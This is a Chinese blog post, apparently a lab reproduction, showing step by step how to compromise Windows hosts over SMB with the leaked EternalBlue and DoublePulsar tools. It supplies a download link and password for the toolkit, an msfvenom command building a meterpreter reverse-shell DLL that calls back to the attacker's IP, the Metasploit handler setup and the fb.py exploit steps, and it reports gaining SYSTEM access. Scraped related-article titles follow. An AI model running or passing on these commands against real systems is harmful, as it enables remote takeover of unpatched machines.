靶机:192.168.6.39(windows server 2008 与windows 7测试过,没有问题)

攻击机:192.168.6.42

参考链接

http://www.duorenwei.com/news/5316.html

https://www.t00ls.net/viewthread.php?tid=39343&highlight=%E6%96%B9%E7%A8%8B%E5%BC%8F

工具的下载地址:http://pan.baidu.com/s/1dEYJQaH   密码:v5cj

利用说明:

本次实验首先执行脚本攻击,对目标IP、端口、系统版本等进行设置,接下来生成恶意的dll文件,并使用脚本加载它,最终达到实验目的。

主要是针对windows主机的SMB、RDP协议进行攻击,因为我主要根据他们提供的payload的程序,利用这两个模块eternalblue和Doublepulsar可以对攻击smb和rdp协议

在pentestbox下运行

1、实现交互端口

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.6.42

监听本地端口并且生成一个.dll的文件。本地主机的IP地址是192.168.6.42,监听的端口是6666。

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.6.42 lport=6666 -f dll -o E:\1\111.dll

2、设置本地监听的端口

msfconsole

use exploit/multi/handler

set payload windows/x64/meterpreter/reverse_tcp

set lhost 192.168.6.42

set lport 6666

run

在cmd中,即python的根目录下实现:

shadowbroker是方程式工具

E:\Install\work\python_2.6.6>python E:\1\shadowbroker\shadowbroker\windows\fb.py

先进行测试

use Eternalblue

fb Special (Eternalblue) > use Doublepulsar

填上payload的地址

一直回车直到出现运行成功为止;

来到监听的端口,是上面的2的过程,查看,进入meterpreter下面,运行shell。进入远程服务器,这里是2008系统。

whoami查看,获得了system权限。

windows sever 2003测试失败

工具的利用方式--成功

E+D:eternalblue+Doublepulsar相关推荐

  1. linux运行fuzzbunch,方程式0day ETERNALBLUE复现之Empire ampamp; Msfconsole下的she...

    在本文中我将为大家复现在前段时间被曝出的,方程式0day Eternalblue的利用过程.Eternalblue通过TCP端口445和139来利用SMBv1和NBT中的远程代码执行漏洞.从涵盖的操作 ...

  2. 微软EternalBlue永恒之蓝漏洞攻击测试

    版权声明:转载请注明出处:http://blog.csdn.net/dajitui2024 https://blog.csdn.net/dajitui2024/article/details/7939 ...

  3. 20145330 《网络对抗》 Eternalblue(MS17-010)漏洞复现与S2-045漏洞的利用及修复

    20145330 <网络对抗> Eternalblue(MS17-010)漏洞利用工具实现Win 7系统入侵与S2-045漏洞的利用及修复 加分项目: PC平台逆向破解:注入shellco ...

  4. 2021-08-26 网安实验-Windows系统渗透测试之EternalBlue漏洞利用复现

    Metasploit :是一款开源的安全漏洞检测工具. fb工具目录:Shadow Brokers 公布的NSA方程式组织黑客工具包Windows部分工具,里面包含了IIS6.0.445端口.3389 ...

  5. 反黑风暴·记一次遭遇 SSDP DDoS 和 EternalBlue(永恒之蓝)攻击经历

    反黑风暴·记一次遭遇 SSDP DDoS 和 EternalBlue(永恒之蓝)攻击经历 前言 故事一:SSDP DDoS 故事二:EternalBlue(永恒之蓝) 总结 参考 作者:高玉涵 时间: ...

  6. 利用永恒之蓝入侵服务器复制文件,永恒之蓝漏洞利用复现(示例代码)

    一.环境搭建: IP地址 系统信息 备注 角色 192.168.0.244 win7旗舰版(未安装MS17-010补丁版本) 需开启445端口及SMB协议 靶机 192.168.0.105 win7旗 ...

  7. MS17-010漏洞复现(x32)以及分析

    复现可以使用两种方式 1.ShadowBroker释放的NSA工具 2.kali的Metasploit 第一种网上有很多教程 https://www.freebuf.com/sectool/13207 ...

  8. 永恒之蓝MS17-010

    永恒之蓝MS17-010 实验概述   Ms17-010漏洞又称永恒之蓝漏洞,自从EternalBlue这个Exploit被影子经纪人公布到互联网上后,就成为了"明星".在过去的五 ...

  9. linux 会不会受到永恒之蓝漏洞,永恒之蓝漏洞复现(ms17-010)

    永恒之蓝漏洞复现(ms17-010) 漏洞描述: Eternalblue通过TCP端口445和139来利用SMBv1和NBT中的远程代码执行漏洞,恶意代码会扫描开放445文件共享端口的Windows机 ...

最新文章

  1. 每日记载内容总结50
  2. Hadoop之mapreduce 实例三
  3. 返回值_关于GWLP_WNDPROC的那些奇怪的返回值
  4. OpenCv 金字塔之上采样与下采样
  5. 解决iIntelliJ IDEA导入jstl后,jsp中taglib指令无法自动添加uri地址
  6. 裁剪图像周围空白区域_零基础PS纠正倾斜的图像效果
  7. 推荐 | 8 个 SpringBoot 精选项目
  8. Jiaozi帮忙买的Secret Garden的票拿到了,谢谢Jiaozi
  9. java中静态代码块的用法 static用法详解
  10. pcb只开窗不镀锡_FPC、PCB和FFC的关系和区别-美好精密
  11. 【hortonworks/registry】registry 如何创建 互相依赖的 schema
  12. Chronicle 已死,凶手是谷歌!
  13. 温故js系列(11)-BOM
  14. 新增的表单元素 结构伪类选择器
  15. Linux静态库、动态库的制作
  16. c语言编程 scant,C语言编程练习章.doc
  17. 易语言在线播放器源码php,易语言写出自绘播放器列表
  18. 从WORD中取出图片(复制或者另存为)后变模糊了,变得不清楚
  19. 2022-01-05 网工基础(十九)NAT基本原理与配置
  20. 学习笔记(01):3华为工程师 ,带你实战C++(2018版)-09面向对象的思想实战

热门文章

  1. 使用命令行启动VirtualBox虚拟机
  2. oracle行总计,Oracle总计列和行
  3. CMS房产系统内容类的房产门户网站最好还是用原版的模板
  4. 电子元器件分销10亿俱乐部
  5. Fiori学习01-前期准备
  6. 浅谈企业级物联网平台
  7. 文件打开方式关联错误解决方法
  8. 网瘾室友用一个月的时间,面试进入了网易,他是怎么做到的?
  9. linux服务器上使用find查杀webshell木马方法
  10. 路由选择协议——RIP协议